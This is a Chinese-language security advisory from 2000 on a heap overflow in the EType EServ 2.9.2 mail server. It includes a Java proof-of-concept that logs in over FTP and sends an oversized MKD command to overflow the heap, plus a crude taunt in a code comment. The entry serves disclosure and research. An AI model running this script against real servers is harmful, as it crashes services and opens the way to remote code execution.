EType EServ Mail服务器远程溢出漏洞
发布日期:2000-06-08
更新日期:2000-06-09
受影响系统:Etype Eserv 2.9.2
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
描述:
EType EServ邮件服务器收到一个很长的请求字符串后,当它试图记录这个请求的时候将会
发生缓冲区溢出,远程攻击者可能利用这个漏洞来执行任意命令。这是一个堆溢出。
<* 来源:Drew <wizdumb@leet.org> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
* Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
*/
import java.io.*;
import java.net.*;
class eservheap {
public static void main(String[] args) throws IOException {
if (args.length < 1) {
System.out.println("Syntax: java eservheap [host] <user> <pass>");
System.exit(1); }
Socket soq = null;
PrintWriter white = null;
BufferedReader weed = null;
try {
soq = new Socket(args[0], 21);
white = new PrintWriter(soq.getOutputStream(), true);
weed = new BufferedReader(new
InputStreamReader(soq.getInputStream()));
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }
weed.readLine();
String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER
anonymous";
String pasz = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
white.println(juzer + "\n" + pasz);
weed.readLine();
weed.readLine();
white.print("MKD ");
for (int i = 0; i < 10000; i++) white.print("A");
white.println(); // uNf! Who yoh daddy, bitch?
weed.readLine();
white.println("QUIT"); } }
建议:
暂无
浏览次数:6176
严重程度:0(网友投票)